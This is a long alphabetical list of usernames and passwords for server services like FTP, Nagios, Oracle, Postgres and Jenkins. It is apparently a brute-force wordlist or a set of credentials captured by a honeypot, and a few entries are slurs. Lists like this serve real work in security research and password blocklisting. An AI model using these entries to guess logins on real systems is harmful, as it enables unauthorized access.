dorin1234dorin
doris
dorneypark
dos
dota2
dota2server
doug
doug123
dovecot
download
download123
download@123
downloader
downloads
downloads1
downloads123
downloads2
downloadsdownloads
dp9
dqiKUryBcyif
dr.springer
dragon
dream
dreambox
dreamer
dreamfish007
dreamweaver
dreher
drew
driver
drowssap999
drunk
dsa100tempPass
dsa123...
dsa321...
dsdsdsd
dsdsdsds
dsdsdsdsd
dserver
dsfsdfsdfsd
dsgTGdGDFH683HfdD234
dsgajdgjsaghduy
dspace
dspace123
dspace@123
dspang
dspang123
dspang@123
dssssss
dsyrovetskiy
dtop
dumitrescu
dummy
dummy123
dummy@123
dup
dvd
dvs
dw330
dxter
dy53_CNC
dylan
dyndns
dzmitry
dzpyerg9
dzztb1
e
e3w2q1
e7d7v9d54y
eHQD91VXAvn6VY
e_mail
earefeva
easton
ec1
ec2
ec2-user
ec2-user123
ec2-user321
ec2user
ec3
eclipse
economist
ecrio
ecrio1
ecrio123
ecrio1234
edc!@#123
edityahoo.no
edong!@#
edongidc
edu
education
edward
edwin
edyhacksiedy
eee123
eeeeee
eempire99
eevdokimov
efKO1$4?
efault
egarcia
egarcia123
egg123
egorovv
ehcapa
ehost
einstein
ejabberd
ejzgvbfqdfgwqef
ekdms3486
ekp
ela
elasticsearch
eldoom
electrical
electrical123
electrical@123
eleet
elemeshin
elena
eleve
eli
elias
elijah
eliott
elisa
eliza
elizabeth
elizabeth1
elke
ellie
ellie123
elmar
elvis
ely
email
email!@#2015
email123
email2
email_123,./
email_2015
emailemail
emde
emergency
emerson
emfla!@#$
emily
emma
emma123
emma@123
empire12
enable
encrypt
encrypted
end
eneg
engineer
england
enimder
enimder123
enju
enkjcom
enter
enterprise
epicrouter
eppc
eriamjh
eric
eric123
eric@123
ericpass
erik
erika
ernie
erp
erp123
erp@123
erreur
esc
escrow
eshop
eshop123
eshore
eshore!@#
eshore123
esinidc
esterno
estudiante
eszrdx
etc
eth
eth0
ethan
ethernet
etherpad
etqe2a
euroboss
eurodinamo
europe
euroset805s
euser
evan
eve
everythingiz1m3g4a
ewaydns123
ewqasd
ewqdsacxz
example
excel2003
exchange
execute
expert
expert03
exploit
exploitpack
explorer
export
export123
export@123
extensiosaasleader007
eyes
ezaretskaya
f
f-f=f0f9f8f7f6
f-f=f0f9f8f7f6b11a1b8
f0.514/*+r
f00b3f02702df170beacf74e0b3dff7c
f00r1k00r1
f0rum
f0rum123
f1031nn
f27cb233e6f02686
f4g$hthFwscdg
f976efb7524d473e67fff619f7600811
f9uthlavIaPhlawroEXi
fSBCSqPFoled
fabien
fabio
fabrice
fabrika
faca102030
faceflow321
factoria
fagaras
faggot
faker
falko
fallout
false
family
fanfan...
fanfan....
fanfmspania
fankhauser
farrell
faruque
fatcow
father
father 
fatimac
fatimac123
fax
fax123
fbebdsbsmfm345b234b23b432b4dffs
fckgwrhqq2
fdfdsfdfdsf
fdfsdfsdfs
fdsa3rw3&#^%%)c~fnj
fedora
fedora7svm
feel
feelinginlove
feitong!@#
felipe
fernandez
fester
festival
fffa2t
ffffff
ffins
fft_dbkbb_020103
fhkj
fiatmx1q2w3e
fie2007
field
file
files
filezila
filezila123
film
finance
finance123
finance@123
finder
finish
fink
fireball
firedrop2
firefox
firewall
firewall 
first
fischsup
fivranne
fjaslkj
fkjhjkds
flUjeuhOk
fld
floiubestepeinab8ec3103f05c47b34759672a3fa14bf4
floiubestepeinssssssssssab8ec3103
floiubestepeinssssssssssab8ec3103f05c47b34759672a3fa14bf4
floo4all
flood
floodflood
florin
florin1977
fls
fluffy
fmaster
fmaster123
fmaster@123
fms
fms123
fms@123
foeger
foobar
football
force
force2
forest
forest123
forever
fortresstemp
forum
forum123
foster
found
foxythekid
fr33bsd
france
francis
francisco
frank
frankej
franksinatra
fred
fredfsd
free
freebsd
freedom
freeman
freenas
freetrial
freeze
frei
fresh
freund
freund123
freyna
freyna123
frodo
frontdesk
frontrow
fs1234567890
fschury
ftn
ftp
ftp1
ftp123
ftp1234
ftp123ftp
ftp321
ftp@123
ftp_pass
ftpadmin
ftpftp
ftpftp123
ftpguest
ftproot
ftpsecure
ftpserver
ftptest
ftptest01
ftptest123
ftptest@123
ftptestuser
ftpuser
ftpuser01
ftpuser1
ftpuser123
ftpuser1234
ftpuser123ftpuser
ftpuser1@123
ftpuser321
ftpuser@123
ftpusr
fu
fuck
fuckyou
fuckyouromaniar35p3ct
fule
future
fuwuqi1
fv11r01rc3@l
g00d
g0df0r3v3r
g0phet
g0tr00t
g1t
g1t123
g2wvs3mJe6H6
g30123-+
g3tt1ng1t
g4902jk1k
gR@p3Ap3
gabriel
galaxy
game
gameover
gamers
games
games1
games123
games2
games3
gangyi
ganteng
gaopeng
garfield
garfield123
garrysmod
gary
gary123
gasse
gast
gast1
gast123
gate
gate1
gate123
gate1234
gateway
gaurav
gaurav123
gaurav@123
gavin
gay
gbl123!@#
gch587
gchristoche
gcyidong008sky
gd123456
gd@123456
gdm
geburtshilfe
geili
geili2015
geisidc123456
gen1
gen2
gene
generalmanager
genoveva
george
geqian520
gerald
gergo
geri
geri123
geri@123
gerrit2
gerry
getmail
getmail123
getmail1234
gfep
gfgfgf
ggdaseuaimhrke
ggg
ggg123
ggghhh
gh
gh0st
ghaith
ghegheb0ss
ghghjkl
ghitr
ghost
ghost123
ghqwpo%$^&
giaantvps
gigabyte
gilmestr
ginell
giovanni
girl
git
git!@#
git1
git12
git123
git1234
git12345
git123456
git123git
git2
git2012
git3
git321
git4321
git54321
git@123
gitadmin
gitgit
gitgit123
gitlab
gitlab123
gitlab@123
gitolite
gitosis
gittest
gituser
gituser12
gituser123
gituser1234
gjbcqwqsrqrg
gkskfh
glacier
glass
glassfish
globalflash
globalflash123
globalflash@123
glorp
gm0d
gmjia75nigansm
gmjiadianhenhao
gmjiakankan74
gmjiasf123cc
gmjiasssyyygg
gmod
gmod1
gmod11
gmod12
gmod123
gmod22
gmod321
gnats
gnuworld
gnuworld123
go2hell
goautodiai
god
godblessyou
godet
godmode
godver
godzilla
goflex
gog
goges
goges123
gohes@123
gonesme712
gongxifacai
good
good123
good123456
good168dns
goodbaby
goodbye
goodluck
goodroot
google
google 
google.com
gopher
gosh
gosh123
gotit
gotonetslimimi
gpadmin
gpsbackup1006$%^
gr33nt4um8
gr3g
gracie
grauru123
grayson
green
green123
greenplanet
greg
greg123
gregor
gregor123
gregory
grid
grid123
grilboy
grosminet
group1
groupnamedetached
grupo
grupo1
grupo2
gso381
gsoft
gt05
guanli
guardian
guest
guest01
guest1
guest123
guest123!@#
guest1234
guest321
guestaccount
guestguest
guigui748!@bjwangluo.net
gupta
gupta123
gupta@123
gvs
gx123456
gyZFHuszzcEB
gyg0sd
gyg0sd@GYGNBD
gyongyi
h0rs3
h0stm4st3r
h0stm@st3r
h0stm@ster
h0stmaster
h123445
h179350
h1rt1h1
h1z1
h3cadmin
h3nny
hack
hacked
hacker
hacker007
hacker1337
hacker2015
hacker520
hackerrull
hacking
hackjungw@
hackteam
hacluster
had00p
had00p123
hadoop
hadoop1
hadoop123
hadoop1234
hadoop321
hadoop@123
haibis
haibis123
hakan
halflife
hallo
halo
halt
hammer
hamster
handsome
hank
hank123
hannes
hannes123
hannes1234
hans
hansz
hansz123
hansz@123
hao!@#
hao123
hao123.
hao123...
hao123.com
happy1
happy2015
happynew
happynewyear
harddisk
hardik
hardline
harrypotter
harvey
havsbr1s
hawkee
hbgug7800
hbp0r6x2
hbpahw
hc
hc123456987
hcat
hd123456
hdfs
hdfs123
hdfs@123
hduser
hdyy
hearthstone
heedann_530@163.com
heis
helen
helen123
hello
hello123
hello1234
hello321
helloworld
help
helpdesk
henneman
henny
henny123
henny1234
henny321
henry
herbert
heremon
heremon@./
hermes
hexin
hf
hg
hhh123
hhhhhh
hidden
hide
highspeed
hihuminin123
hihuminmin123
hill
hill123
himanshu
himanshu123
himanshu@123
hinet
hiroki
hiroshi
hitler
hive
hiwi
hjgh@21
hk!@#lfs75
hkerp
hld2013
hlds
hmsftp
hmthio
ho4uku6at
hoermandinger
hol
holy
holy123
holzmann
home
home123
home2
homelinux
hongniu
horror
hostclear
hosteurope
hostgator
hosting
hostm4st3r
hostm4ster
hostm@st3r
hostm@ster
hostmast3r
hostmaster
hostmaster123
hostmaster1234
hostmaster321
hostmonster
hostname
hots
hotsserver
howard
hpdb
hplip
hr
hsvyxgvq
htidc.com
html
html123
htmlhtml
htpcguides
htpguides
hts
hts123
hts@123
http
httpd
httpd123
huafan
huafan123
huang
huangdaxian..
huangshang
huashu
huatenggz
huatengscube123456789
huawe!
huawei
huawei!@#$%
huawei#123
huawei%^&*
huawei.com
huawei123
huawei123!@#
huawei2011
huawei@123
huawei_123
huaweitest
huds0n
hudson
hudson123
hudson1234
hudson12345
hudson321
huercal
hugues
hundsun
hunter
husker
hy2015
hyanamala
hyanamala123
hyanamala@123
hychenwei0130
hydraweb
hyper
hyperic
hyperic123
hyperic@123
hz123
hz123123
hz123445
hz123445789
hz51la
hz@163.com
hzhost.com
i1o2p3
iDirect
iJ93MnFj4VnWf0sA78gCx
iamhacker22
iamhugo
iamjustsendingthisleter
iamroot
iamsemon
ian
iapart3
ibatch
ibelostotskiy
ibiza0231
ibm@123
ibmuser
ic
ice
iceberg
icecast
icecast2
icecube
icekey
iceman
ichliebedich
icinga
icinga2
icsics
id
idc
idc!!@@##
idc!@#
idc!@#$%^
idc!@#123
idc..
idc...
idc.cn
idc.net
idc0514
idc123
idc123!@#
idc123...
idc123123
idc1234
idc1234%^&*
idc123456
idc123qwe
idc2-pl,=[;.
idc2.com.cn
idc200999
idc200999!@#
idc2010
idc2015
idc@123
idc^%$#@!654321
idc_2015
idccom
idcdb8888
idcez
idcez123
idcgs
idcidc
idcoa8088
idcs.cn
idcserver
idctest
idcuser
ideahost
ideasadm
ident
identd
ieri
ifeelgood
ihateyou
ikeda
ilich
iloveyou
ilshat
im
image
image123
images
images123
imvu
in
ina
inads
include
index
india
indiana
ines
info
info!@#123
info1
info12
info123
info1234
info2
info321
info@123
infoinfo
infoinfo123
infores
information
informations
informix
informix123
infox1eies2sps3was4!
inginer
ingo
ingrid
initpw
inlvlytxr
innovaxxion2k
insert
insight
inspur
install
integrator
intel
intelligence
inter
interface
internal
internet
interpol
intop.cn
intranet
inuxrulz
investor
invite
ioppoi
ios
ip46262
ipage
ipecscm
iphone
iphone5s
iphone6
ipipip
iptc
iptv
ipv4
iraf
irc
ircd
iresha
irina
iring
isaac
isabella
isaiah
ishalyminov
ishalyminov123
iskren
iskren123
iskren@123
ispconfig
ispconfig123
ispconfig1234
ispconfig321
israel
isser
issue
it
it123456
its
its123
its@123
itsupport
iuuuuSAS@12
ivan
ivkr
ivp4
ivp5
ivp6
j00mla
j00mla123
j00mla1234
j123445
j1r@
j1ra
j1ra123
j28Mac;!3
j3nk1ns
j3nkins
j4s0n
j4son
j@s0n
j@son
jKRMdB8v
jKRMdB8v123
jabber
jac
jace
jack
jack123
jackass
jackson
jacky
jacob
jade
jake
jake123
jalla256
jam623
james
james123
jana
jancarik
jancarik1
jancarik123
jancarik1234
jane
janet
janet123
jang
janine
janine123
japan
japan123
japan2015
jaqueline
jas0n
jasmine123
jason
jason1
jason123
jason1234
jason321
jasson@mas2010.com
jasson_mas08
jasson_mas2012
jassonsoft@mas08
jassonsoft_mas08
jassonsoftim05
jatema
jatin
jatin123
jatin@123
java
javi
javier
jaxon
jaxson
jay
jaycob
jayden
jayendra
jayendra123
jayendra@123
jazz
jb0ss
jbmeiyoua
jbo55
jboss
jboss123
jboss1234
jboss123jboss
jboss321
jboss@123
jca
je
jean
jeanata
jeff
jeff123
jeffjeff
jeffrey
jenk1ns
jenkins
jenkins123
jenkins1234
jenkins12345
jenkins123jenkins
jenkins2012
jenkins321
jenkins@123
jenkinsjenkins
jenkinsjenkins123
jennan
jennie
jeremiah
jerry
jerry123
jerryjerry
jessica
jessie
jet
jet'aime
jet`aime
jetaime
jetty
jfeoktistova
jghjhgjhgj
jh123445
jh41577
jh654321
jhckk
jhcnc
jhcnc2008
jhdx123456
jhesrhel
jhesrhel123
jhf77364JHGFASHDF2TY3
jhhoijio
jhksdfsd
jhyy123
ji394su3
jiabiaokun
jiahuo
jiahuo111111
jiajia
jiamima
jianguo0.1
jianguo0.1.add
jiayuan
jiehIep9oudl8choabrLadI1V
jim
jim123
jimodeshalou
jindun
jir4
jir@
jira
jira123
jira1234
jira321
jira@123
jirajira
jirajira123
jiranagios
jishuyuan
jitesh
jitesh123
jitesh@123
jiubugaosuni
jiushiaini
jjidc.com
jjj
jk
jk123
jk@123
jkjkjkjkjkjkjkjkjkjkjk
jkjljlkjljk
jkliwasd@9906
jkljj
jlk;lkj;l
jmsidc.com
jnanchito
job
jobs
jobs123
jobs2
jobs@123
jobsjobs
jocelyn
jocelyn123
jochen
joe
joe123
joerg
john
john123
johnny
johnv
johsun
joinUS!@1
jojo
jon
jonah
jonah123
jonathan
jonny
jooml4
joomla
joomla1234
joomla123joomla
jordan
jordan1
jose
joseph
joseph123
josh
joshua
josiah
jovcpb
joyce
jrimla5225
jsfgvjasdf89s7dfisdfjhgdf
jsidc
jsjs
jthj43njfmk
jtidc-1346
jtyutytyuty
ju4n
ju@n
juan
juan1
juan123
juan1234
juan321
judith
judy
juijkji9kioklko0
julia
julian
julie
julie123
juliejung
juliejung123
jun
junior
junior1
jurca4ileana
just4scan
justdoit
justice
justin
jw
jwsoft
jx56781234
jxshangrao!@#
jywl!@#$
jywl****
jywl888
jzapata
jzapata123
k1ng1*
k23.cn
k2lhwq
k3v1n
k3vin
k960925.
kai
kaixin001
kaixuan360
kaka
kali
kalilinux
kalimero1984
kamal
kamal123
kamal@123
kamematsuweb556
kanjinel123
kankan
kaobaole!(@*2644
kaossh88
kapferer
kaptain
karaf
karin33greid53
karoca
karol
kart3l
kartel
kartel123
kartel1234
kassandra
kassandra123
kasseroler
kate
katie
katja
kawayi
kay
kayden
kb
kcpfhome--
kdm
kedr
keep
keiv
keiv123
kelly
kent
kenwod
kenwood
kenyan
kermit
kernel
kernoops
kev1n
kevin
kevin123
kevin1234
kexdhs.c
key
kg3757
kgpgadmin
kids
kill
kill!@#
killall
killbill
killer
kim
kim123
kim@123
kimjongun
king
king123
kinga
kingfish
kingsoft
kioklko0
kiosk
kippo
kiran
kiran123
kiran@123
kirk
kirk123
kirstin123
kishori
kishori123
kishori@123
kiss
kjhsf98dsfincd87y92309iclknal
kjjjjjjjj
kkd8435x
kkk123
kkulkov
klaas
klausur
klog
kloplijk2005
kn0w234hack
kn8940
kneissl
knoll
knoppix
koala
kobayashi123
kodi
koeln
koenig
koha
koitz
kongxx
kongxx123
konyvtar
kopet123
kor
korea
korean
kornherr
korololka
koshelok
kouno
krause
ksadmin169
kuma
kumakuma
kurbatov
kwong
kwong123
kwong@123
kx028897chebeuname+a
kyle
kzHm0qvqYvCJ
l!sababeln888wx*
l1nux
l1sa
l3tm31n
l3tm3in
l7q1smpp
l;'';l
l@ur3nt1uZ3us
lab
labuser
ladybird
lahiru
lakost
lalala
lan
landon
landscape
lanxun@CC
lanyue
lanzhong654321
laoairun39371
laraht
laraht123
larisakush
larry
lars
laser
last
latitude
laur1234
laur1234567
laura
laura1981
lauren
lauren1234
laurence
laurent
lazarus
lcadmin
lcfadmin
ldap
ldglite1.0
lea
leader
league
lebedev
lecom
lecunff
lee
leech
lego
lego2
lei!@#!
leila
leinad
leiner
len0vO
lenovo
leo
leon
leon123
leon2
leonardo
leonleon
letmain
letme1n
letmein
letswin
level3
levi
leztieN
lgmarc
lguplus100
liam
libertin
library
libuuid
lidehua
liferay
light
lihui
lihui123
lihui@123
liiowill
lila
limonada
limonada123
linaro
lincoln
linda
link
links
linnux
linrex413
linucswindows
linux
linux 
linux!
linux!@#123
linux...
linux123
linux123!@#
linux123.
linux1234
linux12345
linux123456+
linux147258369+
linux@123
linux_123,./
linux_888
linuxadmin
linuxathome
linuxbyte
linuxhack
linuxhome
linuxlinux
linuxmail
linuxserver
linuxshop
linuxtest
linuxtester
linuxtester2
linuxx
lipp
lisa
lisa123
lisa2
list
liu
liu123
liu@123
liutaoshinidie
liutaowoaini
live
live123
liverpool
liz
liz1
liz123
lizard
lizardsquad
ljkl8089
lkdash32kjfdsabfdskf
lkjhgf
lkjhgfdsa
lms
lms123
lms@123
lmt
ln123456
local
local123
local2
localh0st
localhost
localhost123
locallocal
lock
log
logan
logcheck
login
login123
logs
lol
lolaatolapola
loler11q
loler21432532t
lolgame
lolitanebuna
london
london123
long
long123456
longfeu
longmaster
look
looker
lordhide100
lorenzo
lose
lost
lotto
lotv
louise
louise1
love
love123
love123456
love187329yes
love520
loveandsex4ever
lovelaura
lovelove
lover
loverapid
loveyou
lp
lp2013.comdd
lpkojihu
lqsym
lrac
ls
lschmidt
lscsymbiosis
lsfadmin
lshapps
lshora
lsnoxell
lsw20001
ltenti
ltenti123
luc
luc123
luca
lucaluca
lucas
lucian
lucmulder
ludovic
luis
luke
lunaealba
lupenibah2009hd
luyou1
luyou3
luyouqi
lv15200
lwh
lx
lxdo178v
ly123456
lyn
lynda
lynda123
lynux
lzh-7288
lzw
lzwl89
m&g_2010
m00dle
m1n3cr@ft
m1n3craft
m1n3craft123
m1necr4ft
m1necr@ft
m1necraft
m1necraft123
m37ffs
m41l3r
m4iler
m4rt1n
m4rtin
m@1l3r
m@il3r
m@iler
m@rt1n
m@rtin
ma1l
ma1l3r
ma1ler
macacpemine2013
machida
machine
macko123hacker
mada
madala56756fghfh4564e
madalin123
madhuri
madison
madoareinpula
mag.egger
magazzino
magic4magic
magicdamuie
magician
magnat
magnos
mail
mail123
mail123mail1
mail2
mail3r
mailadmin
mailer
mailer123
mailer1234
mailer321
mailftp
mailguest
mailmail
mailman
mailman123
mailnull
mailserver
maint
malika
malisa
mama
mamainvacanta
man
manager
manager1
manager123
manager2
managermanager
manchester
mandrak3
manfred
mangesh
manis
manis123
manis@123
manuela123
map
mapred
mar1a
marc
marcel
marcus
margraf
maria
maria123
mariah3
marie
marina
mark
mark123
market
marketing
marko24
markus
marry
marry123
mars
mars123
mars2
marsmars
mart!n
mart1n
martin
martin1
martin123
martin1234
martin321
martini
martinm
marylee
maryse
maryse1
mascarici
mashby
mashby123
mashby123456
mason
massamba
master
masterkey
mat
mat123
mat3
mat4
math
mathias
mathieu
matmat
matrix
matrix123
matrix@123
matt
matt1
matt123
matt2006
matt2007
matt4
matthew
matthias
mattmatt
mawhyts5
max
max123
max1234
max2
maxided
maximo
maxmax
may
maya
mb
mbelov
mc
mcserver
mdb
mdpi
mdpi123
mduadmin
media
mediagoblin
mediagoblin123
mediagoblin@123
mega
mega123
mega@123
megabyte
meher
melis
melis123
melis@123
mella
mella123
mella@123
menu
merlin
message
meter
meterapi
metin
metin123
metin2
metin2123
mexal
mfs
mg
mg3555
mhlee
mhlee123
mhlee@123
mhzongie
mia
miami
miami123
michael
michaels
michal
michel
michele
michi123
micro
micro123
micros
microsoft
miemLeH9eSpLAwrIuThieWias
miguel
mike
mike123
mike20
mike@123
milenium
mima
min3cr4ft
min3cr@ft
min3craft
min3craft123
mindy66
mine
minecr4ft
minecr@ft
minecraft
minecraft1
minecraft12
minecraft123
minecraft1234
minecraft123minecraft
minecraft2
minecraft321
minecraft@123
minecraftminecraft
minecraftminecraft123
ming
mininet
minou98
minshaohua
mint
mirc
miss
missionimposible
mkllhhhn789kkqaws
mko
mldwor
mmamaev
mmm123
mmv
mnbvcxz
mndy187
mo4koimo4la
mobile
mobilenetgames
mockbuild
modest
moemoemoe
moemoenju
moemoenju000
molly
molly123
mom
mom123
momchil
momchil123
momchil@123
mona
money
money123
moneybags3
mongodb
mongodb123
mongodb2
mongodb2123
monica
monica1
monit
monit123
monit@123
monitor
monitor123
monitoring
monitoring123
monkey
moodle
moodle123
moodle1234
moodle321
moodle@123
morag
morag123
morgan
mortiimatiideprost
mot
mother
motherfucker
motorola
mourinho1984
mouse
movies
movies123
movies2
moviesmovies
mozilla
mp3
mpschuckit123
mq
mq123
mq@123
mqm
mqm123
mqm@123
mr
msconfig
mster
mucleus.caca.root
muelleru
muffin
muie
muie123
muie1234
muie1muie2
muiedemuie
muiefazanwsx852456
muielake
muiema
muiemuie
muiemulta
multicraft
multimedia
mumu12345
munin
murphy
murphy123
murphy@123
mushazi888
music
music123
music@123
mustang
muziek
mvolkov
my
my_DEMARC
mylove
mylove!@#
mypass
mypassword
mypassword 
mysql
mysql01
mysql123
mysql@123
mysqls
mythtv
mythtv123
n0br0k3r
n0entry
n0entry1
n0spymysystem
n3xus
n4gios
n@g1os
n@gi0s
n@gios
nQZgcc4kQj2a
nadia
nag10s
nag1os
nag2freni
naga
naga123
naga@123
nagi0s
nagio123
nagios
nagios1
nagios123
nagios1234
nagios12345
nagios123nagios
nagios2011
nagios2013
nagios321
nagios@123
nagiosadmin
nagiosnagios
nagiosnagios123
nagiosuser
naibed
nairamcool.00.00
named
nameserver
namroot
nancy
naomi
narcys16
nas
nas123
nas4free
nas@123
nasa
nasa123
nasadmin
natasha
natasha123
nathalie
nathan
nathaniel
nauj
naxin5!ni
nb123445
nb_123,./
nba2005
ncuser
ncuser123
ncuser@123
neb
neb123
needcorrectkey
needhouse
neen
neen123
neen1234
neeraj
neeraj123
neeraj@123
neetha
nemesis
neo
neptune
net12580
netadmin
netapp
netbank
netdiag
netdump
netgear1
netinfo
netlimiter
netline.
netlink
netman
netscreen
network
network123
networknetwork
neupasswort
neusoft
never
new
newadmin
newadmin1
newce
newpas
newpass
news
news123
news2
newsletter
newsletters
newsnews
newuser
newuser123
newuser2
newusernewuser
next
nextgen
nexus
nfidc2011
nfsnobody
nginx
ngorbunkov
nice
nice123!@#
nice_123,./
nicholas
nick
nick1
nickelan
nicolas
nigga
nigger
nigger1
nigger123
nigger1234
night
nighwish
nihao123
nikhil
nilesh5981
nimasile
nimda
nishishui
nitinsuri
nitinsuri123
nitinsuri@123
niuniu
nivek
nizoorheb
njccs7
nk12345
nl123456
nmspw
nnn123
noaccess
noah
nobody
nobody4
noc
noc123
nod32
nodejs
nohack
nokia
nolan
nologin
nolongthing
none
nopass
nopassword
norse
nosaj
nosduh
nosoup4u
notes
notice@$)
notice@$)!
noticias
nova
novice
now.cn123
nowvps@123
nr
nrt
ns
nscd
nsroot
ntp
nu-e-bun
nuEszJvk5yI6
nuha
nuha123
nuha@123
nuklear
nuozic
nut
nut2
nuucp
ny6dfojn
nycb0y19
o.tsaplin
o0i9u8y7
o12nu27
o12nu27password
o9q1w2e3i8u7
oana1982
obits
object
obsedatu110
ocnc123
odejda111
odfvps01
odoo
odoo123
odoo@123
oezpinar
offic
office
office123
office2015
offiece
ofin
ofni
often blank
ohNoNoN0
ohNoNoNo
ohtani123
ok
okm7655
okmnji
okok
okokok
okqy
okxr123445
okzj123
ol23456
oldschool99
oleta
oleta123
oliver
olivia
omalyshev
omercic
omu
on
one
online
onm
oo
op
op3nbr@vo
op3nbrav0
open
openbr@vo
openbrav0
openbravo
openbravo123
openbravo1234
openbravo123openbravo
openbravo321
openbravo@123
openbravoopenbravo
opendoor
opendoor2015***
openelec
openerp
openerp123
openerp@123
openfire
openlgtv
openssh
openvpn
openvpn123
openvpnas
operador
operadorad
operations
operator
opraprod@123
oprofile
oprofile123
oprofile1234
oprofile321
oqcpyOIEPrUi
or@cl3
or@cle
oracle
oracle 
oracle!@#
oracle1
oracle11
oracle123
oracle1234
oracle12345
oracle123456
oracle123oracle
oracle2
oracle2013
oracle321
oracle9
oracle9i
oracle@123
oracleoracle
oracleoracle123
oracol
oracol123
orange
oraprod
oraprod123
oratest
orcale
ortner
oscar
osman
osman123
osman@123
osmc
otbu+1
otr
otr5
otrs
otrs123
otrs1234
otrs12345
otrs123otrs
otrs321
otsubo
out
ovh
owen
owner
p
p$ssw0rd
p0o9i8,./
p0o9i8u7
p0o9i8u7y6
p0o9i8u7y6t5
p0o9i8u7y6t5r4e3
p0o9i8u7y6t5r4e3w2
p0o9i8u7y6t5r4e3w2q1
p0sp
p0stgr3s
p0stgres
p1a2s3s4w5o6r7d8
p2puser
p2puser123
p2puser@123
p4$$w0rd
p4$$word
p455w0rd
p4sst3mp
p4ssw0r
p4ssw0rd
p4ssw0rt
p4ssword
p5uqabR8yegacu8echEw5eWuw
p@$$
p@$$w0rd
p@$$word
p@55w0rd
p@sSw0rd
p@ss
p@ss,./123
p@ss1234
p@ss147258
p@ss147258369
p@ss258369
p@ssw0rd
p@ssw0rd  
p@ssw0rd!
p@ssw0rd123
p@ssw0rt
p@sswd
p@ssword
p@sswrod
pNoah33
pNoah331
pa$$w0rd
pa$$word
pa$$word1
pa55w0rd
pa55word
pacman17
page
paint
pakistan
palimpal
panadepula
panda
panel
panshi1234
pantishin
paper
parade
pardeep
pardeep123
pardeep@123
park
parker
parola
partedmagic
party
pas1sword
pascal
pascalcs
pascalftp
pascalmichel
pascaln
pasquale
pasqualle
pass
pass!@#$
pass,./
pass,./123
pass0000
pass0raluca
pass1111
pass123
pass1234
pass12345
pass123456
pass1234567
pass12345678
pass123456789
pass147258
pass147258369
pass258369
pass7
pass@1234
pass@word
pass@word1
pass@word2
pass@word32
pass_110
pass_119
pass_120
passcisco
passfile
passfile123
passpass
passw0rd
passw0rd!
passw0rd1
passw0rd12
passw0rd123
passw0rd1234
passw0rd321
passw0rt
passwOrd
passwd
passwd!@#
passwd123
passwd1234
passwd12345
passwd123456
passwd321
passwor
password
password 
password  
password!
password!@#
password#!@
password.123
password0
password01!
password1
password1!
password1111
password12
password123
password1234
password12345
password123456
password1234567
password12345678
password123456789
password2008
password23456
password321
password888
password@1
password@123
passwords
passwordz
passwort
passwrd
past
patricia
patriciar
patrick
patrik
patrol
patrol123
patrol@123
paul
pause
pavshino
payala
payment123QWE
payne0
paypal
payr
pbxk1064
pc
pc01
pc02
pc1
pcap
pcsarl,49
pedro
pedro123
pedro1234
pedro321
pelle
pentium
penxxguin
people
pepe
personal
pervuhina
peter
peter123
peter1234
petgord34truew
petra
petrovpa
pettya
pettya123
pfsense
pgsl
pgsql
pgsql123
ph1l1p
ph1w4r3web
pharmacy
philip
philips
phillip
phillip123
phone
photo
photophoto
photos
photos123
photos2
photosphotos
php
php1
php123
phpbb
phpmy
phpmy@123
phpmyadmin
phuket
phuket123
phuket@123
physics
pi
pi1
pi12
pi123
pi1234
pi@123
piCore
picco
piciul
pico
pico2011server
pierre
pilou
pim
pim123
pim@123
pimdbusr
pimdbusr123
pimdbusr@123
ping
pink
pipi
pirate
pizza
pl,okmijn
plasma
player
player123
player@123
playmircplaygame
plesk102020
plex
plex123
plex@123
plus
pm7khapd
pma
pnoah331
pobo
poczta
poe
pohhen
poi098
poiuyt
poiuytrewq
polamea
police
poodah
poor
pop
pop3
popa3d
popetesakam
popo
portal
portal123
portal@123
portatile2
pos
posG23d
posp
posp123
posp1234
posp321
post
postfix
postgr3s
postgres
postgres01
postgres1
postgres123
postgres1234
postgres12345
postgres123postgres
postgres2
postgres321
postgres@123
postgresff
postgrespostgres
postgrespostgres123
postgresql
postgrey
postmaster
postmaster123
power
power!@#
power!@#$%^
power0.123
power123
power123.0
power123445
power123456
power123654
power2008
poweradmin
poweridc
poweruser
ppkpiu1234
praktikant
pramod
pramod123
pramod@123
prasad
prashant
prashant123
prashant@123
pratima
prekUZupruvupruhufuzEstu4
president
print
private
privoxy
prock
production
proftpd
program
proiect
project
project1
project123
project2
projects
projectx
protectedbytimi22
protectedbytimi@@
proxy
proxysrv
prueba
prueba123
pruebas
psdemumu20133koi
psmike
psych
pt
pt123
pt@123
ptty
ptty123
pub
public
public123
public2
publicpublic
pufpuf!!
puiupuiu
pukcab
pulamea
pulamea.com
pulse
punish9899
push
putty
pv0
pvm
pw123
pw123123
pwd
pzd@QWE
q!a@z#
q!w@e#
q!w@e#r
q!w@e#r$
q!w@e#r$t%
q!w@e#r$t%y^u&
q123.0
q123456
q1234567
q12345678
q13nt9aR
q1q2q3q4q5
q1w2
q1w2Q!W@
q1w2e3
q1w2e3,./
q1w2e3e4
q1w2e3r
q1w2e3r4
q1w2e3r4t
q1w2e3r4t5
q1w2e3r4t5y
q1w2e3r4t5y6
q1w2e3r4t5y6        
q1w2e3r4t5y6u
q1w2e3r4t5y6u7
q1w2e3r4t5y6u7i8o9p0
q2w3e4r5
q666666
q7777777
q88888888
q999999999
qart_Tu%WZY
qaswed
qaswed!@#
qawsed
qaz!!!
qaz!@#
qaz#!@
qaz#@!321
qaz123
qaz123!@#
qaz123$
qaz123$%^
qaz123.com
qaz123456
qaz123@com
qaz13.14
qaz1wsx2
qaz1wsx2edc
qaz2wsx
qaz321..
qaz520wsx
qaz888
qaz@wsx#edc
qaz_!@#,./
qaz_123
qazedc
qazqaz
qazwer123--
qazws
qazwsx
qazwsx 
qazwsx    
qazwsx!!!
qazwsx!@#
qazwsx!@#!@#
qazwsx!@#$
qazwsx!@#$%^
qazwsx!@#123
qazwsx12
qazwsx123
qazwsx123!@#
qazwsx12345
qazwsx123456
qazwsx888
qazwsxEDC!@#
qazwsxedc
qazwsxedc!@#$%^&*
qazwsxedc#!@
qazwsxedc123
qazwsxedcrfv
qazwsxedcrfvtgb
qazwsxedcrfvtgbyhn
qazwsxedcrfvtgbyhnujm
qazwsxedcrfvtgbyhnum
qazxcv
qazxcv!@#
qazxsw123
qazxswedc
qazxswedc!@#
qazzaq
qbc_123,./
qbcdef
qgt4bw
qhdidc
qingandbici
qishang
qishang!@#
qishang123
qishang2014.com
qishang@2013
qishangzaixian
qpoeiruty
qpwoei
qpwoeiruty
qq.com
qq123.0
qq123.com
qq123456
qq1234567
qq12345678
qq313994716.
qq5201314
qqaazz
qqq111
qqq123
qqq202020
qqqaaa
qqqqqq
